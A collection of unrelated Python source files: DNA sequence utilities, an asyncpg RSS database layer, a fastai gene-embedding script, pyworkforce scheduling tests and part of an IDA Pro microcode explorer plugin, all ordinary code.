'tac': 50, 'tag': 51, 'tat': 52, 'tca': 53, 'tcc': 54, 'tcg': 55, 'tct': 56, 'tga': 57,
'tgc': 58, 'tgg': 59, 'tgt': 60, 'tta': 61, 'ttc': 62, 'ttg': 63, 'ttt': 64}
@staticmethod
def convert_dna_to_rna(seq):
dna2rna = {'t': 'u', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([dna2rna[s] for s in seq])
@staticmethod
def convert_dna_arr_to_str(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into length N string """
dna_seq_str = ''
for i in range(dna_arr.shape[0]):
token = np.argmax(dna_arr[i, :])
dna_seq_str += base_order[token]
return dna_seq_str
@staticmethod
def get_aa_codons():
aa_list = sorted(list(SequenceTools.protein2codon_.keys()))
aa_codons = np.zeros((len(aa_list), 6, 3, 4))
i = 0
for aa in aa_list:
cods = SequenceTools.protein2codon_[aa]
j = 0
for c in cods:
cod_arr = SequenceTools.convert_dna_str_to_arr(c)
aa_codons[i, j] = cod_arr
j += 1
i += 1
return aa_codons
@staticmethod
def convert_dna_str_to_arr(dna_str, base_order='ATCG'):
""" Convert length N string into N x 4 tokenized array"""
dna_str = dna_str.upper()
N = len(dna_str)
dna_arr = np.zeros((N, 4))
for i in range(N):
idx = base_order.index(dna_str[i])
dna_arr[i, idx] = 1.
return dna_arr
@staticmethod
def convert_dna_arr_to_gray(dna_arr, base_order='ATCG'):
""" Convert N x 4 tokenized array into 2N x 2 tokenized gray code array"""
N = dna_arr.shape[0]
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
token = np.argmax(dna_arr[i, :])
dna_i = base_order[token]
gray_i = SequenceTools.dna2gray_[dna_i]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_gray_to_dna_str(gray_arr):
Ngray = gray_arr.shape[0]
dna_str = ''
i = 0
while i < Ngray:
g1 = int(np.argmax(gray_arr[i, :]))
g2 = int(np.argmax(gray_arr[i + 1, :]))
dna_str += SequenceTools.gray2dna_[(g1, g2)]
i += 2
return dna_str
@staticmethod
def convert_dna_str_to_gray(dna_str):
"""Convert length N string into 2N x 2 tokenized gray code array"""
dna_str = dna_str.lower()
N = len(dna_str)
gray_arr = np.zeros((2 * N, 2))
for i in range(N):
gray_i = SequenceTools.dna2gray_[dna_str[i]]
for j in range(2):
gray_arr[2 * i + j, gray_i[j]] = 1
return gray_arr
@staticmethod
def convert_rna_to_dna(seq):
rna2dna = {'u': 't', 'a': 'a', 'g': 'g', 'c': 'c'}
return "".join([rna2dna[s] for s in seq])
@classmethod
def get_codon_from_idx(cls, idx):
idx2codon = {val: key for key, val in SequenceTools.codon2idx_.items()}
return idx2codon[idx]
@classmethod
def get_start_codon_int(cls):
return SequenceTools.codon2idx_['atg']
@classmethod
def get_stop_codon_ints(cls):
stop_codons = SequenceTools.protein2codon_['stop']
return [SequenceTools.codon2idx_[s] for s in stop_codons]
@classmethod
def translate_dna_str(cls, dna_seq):
dna_seq = dna_seq.lower()
prot_seq = []
i = 0
while i < len(dna_seq):
cod = dna_seq[i:i + 3]
prot_seq.append(SequenceTools.codon2protein_[cod])
i += 3
prot_seq = "".join(prot_seq)
return prot_seq
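if __name__ == '__main__':
    # Minimal usage sketch (not part of the original module): round-trip a short coding
    # sequence through the gray-code helpers and translate it to a protein string.
    dna = 'atgtttggttaa'
    gray = SequenceTools.convert_dna_str_to_gray(dna)
    assert SequenceTools.convert_gray_to_dna_str(gray) == dna
    print(SequenceTools.translate_dna_str(dna))  # -> 'mfg!'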
|
39125
|
from .version import version as __version__
# Delay importing extension modules till after they are built...
try:
from .sxn import *
from . import xdm
# This SaxonProcessor object is used only to control creation and
# destruction of the Saxon/C Java VM...
_sp_init = SaxonProcessor(False, init=True)
except ImportError:
pass
|
39141
|
import config
from selectsql import SelectSql
class RssSql(object):
def __init__(self):
self.database = config.get_database_config()
self.select_sql = SelectSql(self.database)
self.do_not_success = "do_not_success"
self.do_success = "do_success"
self.user = {}
self.xpath = {}
self.xpath_id = -1
#not success,return []
async def get_user_id_password(self,user_name):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT user_id,user_name,password FROM rss_user WHERE user_name = $1
""",user_name)
await conn.close()
return res
#not success,return []
async def insert_xpath(self,user_id,
site_url,
entry_css,
entry_link_css,
add_base_url,
rss_link_prefix,
site_title_css,
site_motto_css,
entry_content_css,
author_css,
datetime_css,
interval_time,
rss_link,
base_url):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
INSERT INTO xpath (user_id,site_url,
entry_css,entry_link_css,add_base_url,
rss_link_prefix,site_title_css,site_motto_css,
entry_content_css,author_css,datetime_css,
interval_time,rss_link,base_url)
VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14)
RETURNING xpath_id;
""",user_id,site_url,entry_css,entry_link_css,
add_base_url,rss_link_prefix,
site_title_css,site_motto_css,entry_content_css,
author_css,datetime_css,interval_time,rss_link,base_url)
await conn.close()
return res
#not success,return []
async def get_xpath_interval_one(self,xpath_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT xpath_id,interval_time FROM xpath WHERE xpath_id = $1
""",xpath_id)
await conn.close()
return res
#not success,return []
async def get_xpath_id_interval_all(self):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT xpath_id,interval_time FROM xpath
""")
await conn.close()
return res
#not success,return []
async def get_xpath_from_user_id(self,user_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM xpath WHERE user_id = $1
""", user_id)
await conn.close()
return res
#not success,return []
async def get_xpath_one_from_xpath_id(self,xpath_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT * FROM xpath WHERE xpath_id = $1
""", xpath_id)
await conn.close()
return res
#not success,return []
async def get_xpath_one_from_url_name(self,url_name):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM xpath WHERE rss_link = $1
""", url_name)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
return res
#not success,return []
async def update_xpath_one_from_rss_link(self,
site_url,
entry_css,
entry_link_css,
add_base_url,
site_title_css,
site_motto_css,
entry_content_css,
author_css,
datetime_css,
interval_time,
rss_link,
base_url
):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
UPDATE xpath SET site_url = $1,
entry_css = $2,entry_link_css = $3,add_base_url = $4,
site_title_css = $5,site_motto_css = $6,entry_content_css = $7,
author_css = $8,datetime_css = $9,interval_time = $10,
base_url = $11
WHERE rss_link = $12 RETURNING xpath_id
""",site_url,entry_css,entry_link_css,add_base_url,
site_title_css,site_motto_css,entry_content_css,
author_css,datetime_css,interval_time,base_url,
rss_link)
await conn.close()
return res
#not success,return []
async def insert_rss(self,user_id,xpath_id,site_title,rss_url_name,
rss_content,rss_last_build_time,rss_sha256sum):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
INSERT INTO rss (user_id,xpath_id,site_title,rss_url_name,
rss_content,rss_last_build_time,rss_sha256sum)
VALUES ($1,$2,$3,$4,$5,$6,$7) RETURNING xpath_id
""", user_id,
xpath_id,
site_title,
rss_url_name,
rss_content,
rss_last_build_time,
rss_sha256sum)
await conn.close()
return res
#not success,return []
async def get_one_rss_from_userid_xpathid(self,user_id,xpath_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetchrow("""
SELECT * FROM rss WHERE user_id = $1 AND xpath_id = $2;
""", user_id,xpath_id)
await conn.close()
return res
#not success,return []
async def get_all_rss_from_userid(self,user_id):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM rss WHERE user_id = $1
""", user_id)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
if len(res) == 0:
res = [{"site_title": "rss_is_none","rss_url_name": "no_url"}]
return res
#not success,return []
async def get_one_rss_from_url_name(self,url_name):
conn = await self.select_sql.sql_conn()
res = await conn.fetch("""
SELECT * FROM rss WHERE rss_url_name = $1
""", url_name)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
if len(res) == 0:
res = [{"rss_content": "no rss,maybe deleted","rss_url_name": "no_url"}]
return res
#not success,return "do_not_success"
async def update_one_rss_xpath_id(self,rss_content,
rss_sha256sum,xpath_id):
conn = await self.select_sql.sql_conn()
try:
res = await conn.execute("""
UPDATE rss SET rss_content = $1,
rss_sha256sum = $2 WHERE xpath_id = $3
""",rss_content,
rss_sha256sum,xpath_id)
await conn.close()
except:
res = self.do_not_success
return res
else:
return res
#not success,return []
async def delete_one_rss_from_url_name(self,url_name):
conn = await self.select_sql.sql_conn()
res1 = await conn.fetchrow("""
DELETE FROM rss WHERE rss_url_name = $1 RETURNING *
""", url_name)
res2 = await conn.fetchrow("""
DELETE FROM xpath WHERE rss_link = $1 RETURNING *
""",url_name)
await conn.close()
#print(f"the user_id is:{user_id}")
#print(f"the rss is:{res}")
        if res1 is not None and res2 is not None:
res = self.do_success
else:
res = self.do_not_success
return res
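# Usage sketch (illustrative; requires the accompanying config/selectsql modules and an
# asyncio event loop, e.g. inside an async web handler):
#   rss_sql = RssSql()
#   row = await rss_sql.get_user_id_password('some_user')
#   feeds = await rss_sql.get_all_rss_from_userid(row['user_id']) if row else []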
|
39188
|
from __future__ import print_function
from argparse import ArgumentParser
from fastai.learner import *
from fastai.column_data import *
import numpy as np
import pandas as pd
import seaborn as sns
def build_parser():
parser = ArgumentParser()
parser.add_argument('--data', type=str, nargs=None, dest='in_path', help='input file path', required=True)
parser.add_argument('--out-prefix', type=str, nargs=None, dest='model', help='output prefix', required=True)
parser.add_argument('--out-dir', type=str, nargs=None, dest='out_dir', help='output directory', required=True)
parser.add_argument('--num-dim', type=int, nargs=None, dest='num_dim', help='number of dimension of resulting embedding', required=False, default=50)
parser.add_argument('--bs', type=int, nargs=None, dest='bs', help='batch size', required=False, default=64)
parser.add_argument('--num-epoch', type=int, nargs=None, dest='num_eps', help='number of epoch(s)', required=False, default=3)
parser.add_argument('--learning-rate', type=float, nargs=None, dest='lr', help='learning rate', required=False, default=1e-5)
return parser
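# Example invocation (illustrative only; the script name and file paths are
# placeholders, the flags are the ones defined in build_parser above):
#
#   python collab_embed.py --data expression_matrix.csv \
#       --out-prefix run1 --out-dir ./results \
#       --num-dim 50 --bs 64 --num-epoch 3 --learning-rate 1e-5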
def main():
parser = build_parser()
opts = parser.parse_args()
if torch.cuda.is_available() and torch.backends.cudnn.enabled:
torch.cuda.set_device(0)
else:
print('CUDA or CUDNN not available.')
return
in_path = opts.in_path
n_factors = opts.num_dim
bs = opts.bs
num_eps = opts.num_eps
lr = opts.lr
out_dir = opts.out_dir
prefix = opts.model
outpath = out_dir+'/'+prefix+'_'
### data preparation
df = pd.read_csv(in_path, sep=',', low_memory=False, index_col=[0], error_bad_lines=False)
sids = list(df.index)
df = df.assign(id=sids)
df = df.reset_index(drop=True)
mdf = pd.melt(df, id_vars=['id'], var_name='gene', value_name='log2exp')
### training
val_idxs = get_cv_idxs(len(mdf))
cd = CollabFilterDataset.from_data_frame(out_dir, mdf, 'id', 'gene', 'log2exp')  # fastai writes its tmp/model files under this path
learn = cd.get_learner(n_factors, val_idxs, bs, opt_fn=optim.Adam)
learn.fit(lr, num_eps)
learn.save(outpath+'model')
### plot jointplot
preds = learn.predict()
y=learn.data.val_y
jp = sns.jointplot(preds, y, kind='hex', stat_func=None)
jp.set_axis_labels('predicted log2(exp)', 'ground truth log2(exp)')
jp.savefig(outpath+'trn_metric_jointplot.png')
### output embedding
genes = list(df.columns[:-2])
sids = list(df['id'])
geneidx = np.array([cd.item2idx[g] for g in genes])
m=learn.model
m.cuda()
### output gene embedding matrix and bias
gene_emb = to_np(m.i(V(geneidx)))
gene_emb_df = pd.DataFrame(gene_emb, index=genes)
gene_emb_df.to_csv(outpath+'gemb.csv', sep=',')
gene_emb_bias = to_np(m.ib(V(geneidx)))
gene_emb_bias_df = pd.DataFrame(gene_emb_bias, index=genes)
gene_emb_bias_df.to_csv(outpath+'gemb_bias.csv')
### output sample embedding matrix and bias
sampleidx = np.array([cd.user2idx[sid] for sid in sids])
samp_emb = to_np(m.u(V(sampleidx)))
samp_emb_df = pd.DataFrame(samp_emb, index=sids)
samp_emb_df.to_csv(outpath+'semb.csv', sep=',')
samp_emb_bias = to_np(m.ub(V(sampleidx)))
samp_emb_bias_df = pd.DataFrame(samp_emb_bias, index=sids)
samp_emb_bias_df.to_csv(outpath+'semb_bias.csv')
if __name__ == '__main__':
main()
|
39192
|
from pyworkforce.shifts import MinAbsDifference, MinRequiredResources
import pytest
def test_min_abs_difference_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinAbsDifference(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=25,
max_shift_concurrency=20)
solution = scheduler.solve()
assert solution['status'] == 'OPTIMAL'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert len(solution['resources_shifts']) == num_days * len(shifts_coverage)
for i in range(num_days * len(shifts_coverage)):
assert solution['resources_shifts'][i]['resources'] >= 0
def test_infeasible_min_abs_difference_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinAbsDifference(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=10,
max_shift_concurrency=20)
solution = scheduler.solve()
assert solution['status'] == 'INFEASIBLE'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert solution['cost'] == -1
assert len(solution['resources_shifts']) == 1
assert solution['resources_shifts'][0]['day'] == -1
assert solution['resources_shifts'][0]['shift'] == 'Unknown'
assert solution['resources_shifts'][0]['resources'] == -1
def test_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=25,
max_shift_concurrency=25)
solution = scheduler.solve()
assert solution['status'] == 'OPTIMAL'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert len(solution['resources_shifts']) == num_days * len(shifts_coverage)
for i in range(num_days * len(shifts_coverage)):
assert solution['resources_shifts'][i]['resources'] >= 0
def test_cost_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
cost_dict = {"Morning": 8, "Afternoon": 8, "Night": 10, "Mixed": 7}
num_days = 2
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
cost_dict=cost_dict,
max_period_concurrency=25,
max_shift_concurrency=25)
solution = scheduler.solve()
assert solution['status'] == 'OPTIMAL'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert len(solution['resources_shifts']) == num_days * len(shifts_coverage)
for i in range(num_days * len(shifts_coverage)):
assert solution['resources_shifts'][i]['resources'] >= 0
def test_wrong_cost_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
cost_dict = {"Morning": 8, "Night": 10, "Mixed": 7}
num_days = 2
with pytest.raises(Exception) as excinfo:
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
cost_dict=cost_dict,
max_period_concurrency=25,
max_shift_concurrency=25)
solution = scheduler.solve()
assert str(excinfo.value) == "cost_dict must have the same keys as shifts_coverage"
def test_infeasible_min_required_resources_schedule():
required_resources = [
[9, 11, 17, 9, 7, 12, 5, 11, 8, 9, 18, 17, 8, 12, 16, 8, 7, 12, 11, 10, 13, 19, 16, 7],
[13, 13, 12, 15, 18, 20, 13, 16, 17, 8, 13, 11, 6, 19, 11, 20, 19, 17, 10, 13, 14, 23, 16, 8]
]
shifts_coverage = {"Morning": [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"Afternoon": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
"Night": [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
"Mixed": [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0]}
num_days = 2
scheduler = MinRequiredResources(num_days=num_days,
periods=24,
shifts_coverage=shifts_coverage,
required_resources=required_resources,
max_period_concurrency=25,
max_shift_concurrency=20)
solution = scheduler.solve()
assert solution['status'] == 'INFEASIBLE'
assert 'cost' in solution
assert 'resources_shifts' in solution
assert solution['cost'] == -1
assert len(solution['resources_shifts']) == 1
assert solution['resources_shifts'][0]['day'] == -1
assert solution['resources_shifts'][0]['shift'] == 'Unknown'
assert solution['resources_shifts'][0]['resources'] == -1
|
39359
|
import ctypes
import ida_ida
import ida_funcs
import ida_graph
import ida_idaapi
import ida_kernwin
import ida_hexrays
from PyQt5 import QtWidgets, QtGui, QtCore, sip
from lucid.ui.sync import MicroCursorHighlight
from lucid.ui.subtree import MicroSubtreeView
from lucid.util.python import register_callback, notify_callback
from lucid.util.hexrays import get_microcode, get_mmat, get_mmat_name, get_mmat_levels
from lucid.microtext import MicrocodeText, MicroInstructionToken, MicroOperandToken, AddressToken, BlockNumberToken, translate_mtext_position, remap_mtext_position
#------------------------------------------------------------------------------
# Microcode Explorer
#------------------------------------------------------------------------------
#
# The Microcode Explorer UI is mostly implemented following a standard
# Model-View-Controller pattern. This is a little abnormal for Qt, but
# I've come to appreciate it more for its portability and testability.
#
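#
# As a rough sketch of that separation (illustrative only, not part of the
# plugin), the controller below can be driven without touching Qt directly:
#
#   explorer = MicrocodeExplorer()
#   explorer.show(0x401000)                  # decompile + render the function
#   explorer.select_maturity("MMAT_LOCOPT")  # switch the displayed maturity
#   explorer.select_address(0x401013)        # highlight tokens for an address
#
# The addresses and the maturity name are placeholder values; the method names
# come from the class below.
#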
class MicrocodeExplorer(object):
"""
The controller component of the microcode explorer.
The role of the controller is to handle user gestures, map user actions to
model updates, and change views based on controls. In theory, the
controller should be able to drive the 'view' headlessly or simulate user
UI interaction.
"""
def __init__(self):
self.model = MicrocodeExplorerModel()
self.view = MicrocodeExplorerView(self, self.model)
self.view._code_sync.enable_sync(True) # XXX/HACK
def show(self, address=None):
"""
Show the microcode explorer.
"""
if address is None:
address = ida_kernwin.get_screen_ea()
self.select_function(address)
self.view.show()
def show_subtree(self, insn_token):
"""
Show the sub-instruction graph for the given instruction token.
"""
graph = MicroSubtreeView(insn_token.insn)
graph.show()
# TODO/HACK: this is dumb, but moving it breaks my centering code so
# i'll figure it out later...
gv = ida_graph.get_graph_viewer(graph.GetWidget())
ida_graph.viewer_set_titlebar_height(gv, 15)
#-------------------------------------------------------------------------
# View Toggles
#-------------------------------------------------------------------------
def set_highlight_mutual(self, status):
"""
Toggle the highlighting of lines containing the same active address.
"""
if status:
self.view._code_sync.hook()
else:
self.view._code_sync.unhook()
ida_kernwin.refresh_idaview_anyway()
def set_verbose(self, status):
"""
Toggle the verbosity of the printed microcode text.
"""
self.model.verbose = status
ida_kernwin.refresh_idaview_anyway()
#-------------------------------------------------------------------------
# View Controls
#-------------------------------------------------------------------------
def select_function(self, address):
"""
Switch the microcode view to the specified function.
"""
func = ida_funcs.get_func(address)
if not func:
return False
for maturity in get_mmat_levels():
mba = get_microcode(func, maturity)
mtext = MicrocodeText(mba, self.model.verbose)
self.model.update_mtext(mtext, maturity)
self.view.refresh()
ida_kernwin.refresh_idaview_anyway()
return True
def select_maturity(self, maturity_name):
"""
Switch the microcode view to the specified maturity level.
"""
self.model.active_maturity = get_mmat(maturity_name)
#self.view.refresh()
def select_address(self, address):
"""
Select a token in the microcode view matching the given address.
"""
tokens = self.model.mtext.get_tokens_for_address(address)
if not tokens:
return None
token_line_num, token_x = self.model.mtext.get_pos_of_token(tokens[0])
rel_y = self.model.current_position[2]
if self.model.current_position[2] == 0:
rel_y = 30
self.model.current_position = (token_line_num, token_x, rel_y)
return tokens[0]
def select_position(self, line_num, x, y):
"""
Select the given text position in the microcode view.
"""
self.model.current_position = (line_num, x, y)
#print(" - hovered token: %s" % self.model.current_token.text)
#print(" - hovered taddr: 0x%08X" % self.model.current_token.address)
#print(" - hovered laddr: 0x%08X" % self.model.current_address)
def activate_position(self, line_num, x, y):
"""
Activate (eg. double click) the given text position in the microcode view.
"""
token = self.model.mtext.get_token_at_position(line_num, x)
if isinstance(token, AddressToken):
ida_kernwin.jumpto(token.target_address, -1, 0)
return
if isinstance(token, BlockNumberToken) or (isinstance(token, MicroOperandToken) and token.mop.t == ida_hexrays.mop_b):
blk_idx = token.blk_idx if isinstance(token, BlockNumberToken) else token.mop.b
blk_token = self.model.mtext.blks[blk_idx]
blk_line_num, _ = self.model.mtext.get_pos_of_token(blk_token.lines[0])
self.model.current_position = (blk_line_num, 0, y)
self.view._code_view.Jump(*self.model.current_position)
return
class MicrocodeExplorerModel(object):
"""
The model component of the microcode explorer.
The role of the model is to encapsulate application state, respond to
state queries, and notify views of changes. Ideally, the model could be
serialized / unserialized to save and restore state.
"""
def __init__(self):
#
# 'mtext' is short for MicrocodeText objects (see microtext.py)
#
# this dictionary will contain a mtext object (the renderable text
# mapping of a given hexrays mba_t) for each microcode maturity level
# of the current function.
#
# at any given time, one mtext will be 'active' in the model, and
# therefore visible in the UI/Views
#
self._mtext = {x: None for x in get_mmat_levels()}
#
# there is a 'cursor' (ViewCursor) for each microcode maturity level /
# mtext object. cursors don't just contain the 'position' in the
# rendered text (line_num, x), but also information to position the
# cursor within the line view (y)
#
self._view_cursors = {x: None for x in get_mmat_levels()}
#
# the currently active / selected maturity level of the model. this
# determines which mtext is currently visible / active in the
# microcode view, and which cursor will be used
#
self._active_maturity = ida_hexrays.MMAT_GENERATED
# this flag tracks the verbosity toggle state
self._verbose = False
#----------------------------------------------------------------------
# Callbacks
#----------------------------------------------------------------------
self._mtext_refreshed_callbacks = []
self._position_changed_callbacks = []
self._maturity_changed_callbacks = []
#-------------------------------------------------------------------------
# Read-Only Properties
#-------------------------------------------------------------------------
@property
def mtext(self):
"""
Return the microcode text mapping for the current maturity level.
"""
return self._mtext[self._active_maturity]
@property
def current_line(self):
"""
Return the line token at the current viewport cursor position.
"""
if not self.mtext:
return None
line_num, _, _ = self.current_position
return self.mtext.lines[line_num]
@property
def current_function(self):
"""
Return the current function address.
"""
if not self.mtext:
return ida_idaapi.BADADDR
return self.mtext.mba.entry_ea
@property
def current_token(self):
"""
Return the token at the current viewport cursor position.
"""
return self.mtext.get_token_at_position(*self.current_position[:2])
@property
def current_address(self):
"""
Return the address at the current viewport cursor position.
"""
return self.mtext.get_address_at_position(*self.current_position[:2])
@property
def current_cursor(self):
"""
Return the current viewport cursor.
"""
return self._view_cursors[self._active_maturity]
#-------------------------------------------------------------------------
# Mutable Properties
#-------------------------------------------------------------------------
@property
def current_position(self):
"""
Return the current viewport cursor position (line_num, view_x, view_y).
"""
return self.current_cursor.viewport_position
@current_position.setter
def current_position(self, value):
"""
Set the cursor position of the viewport.
"""
self._gen_cursors(value, self.active_maturity)
self._notify_position_changed()
@property
def verbose(self):
"""
Return the microcode verbosity status of the viewport.
"""
return self._verbose
@verbose.setter
def verbose(self, value):
"""
Set the verbosity of the microcode displayed by the viewport.
"""
if self._verbose == value:
return
# update the active verbosity setting
self._verbose = value
# verbosity must have changed, so force a mtext refresh
self.refresh_mtext()
@property
def active_maturity(self):
"""
Return the active microcode maturity level.
"""
return self._active_maturity
@active_maturity.setter
def active_maturity(self, new_maturity):
"""
Set the active microcode maturity level.
"""
self._active_maturity = new_maturity
self._notify_maturity_changed()
#----------------------------------------------------------------------
# Misc
#----------------------------------------------------------------------
def update_mtext(self, mtext, maturity):
"""
Set the mtext for a given microcode maturity level.
"""
self._mtext[maturity] = mtext
self._view_cursors[maturity] = ViewCursor(0, 0, 0)
def refresh_mtext(self):
"""
Regenerate the rendered text for all microcode maturity levels.
TODO: This is a bit sloppy, and is basically only used for the
verbosity toggle.
"""
for maturity, mtext in self._mtext.items():
if maturity == self.active_maturity:
new_mtext = MicrocodeText(mtext.mba, self.verbose)
self._mtext[maturity] = new_mtext
self.current_position = translate_mtext_position(self.current_position, mtext, new_mtext)
continue
mtext.refresh(self.verbose)
self._notify_mtext_refreshed()
def _gen_cursors(self, position, mmat_src):
"""
Generate the cursors for all levels from a source position and maturity.
"""
mmat_levels = get_mmat_levels()
mmat_first, mmat_final = mmat_levels[0], mmat_levels[-1]
# clear out all the existing cursor mappings
self._view_cursors = {x: None for x in mmat_levels}
# save the starting cursor
line_num, x, y = position
self._view_cursors[mmat_src] = ViewCursor(line_num, x, y, True)
# map the cursor backwards from the source maturity
mmat_lower = range(mmat_first, mmat_src)[::-1]
current_maturity = mmat_src
for next_maturity in mmat_lower:
self._transfer_cursor(current_maturity, next_maturity)
current_maturity = next_maturity
# map the cursor forward from the source maturity
mmat_higher = range(mmat_src+1, mmat_final + 1)
current_maturity = mmat_src
for next_maturity in mmat_higher:
self._transfer_cursor(current_maturity, next_maturity)
current_maturity = next_maturity
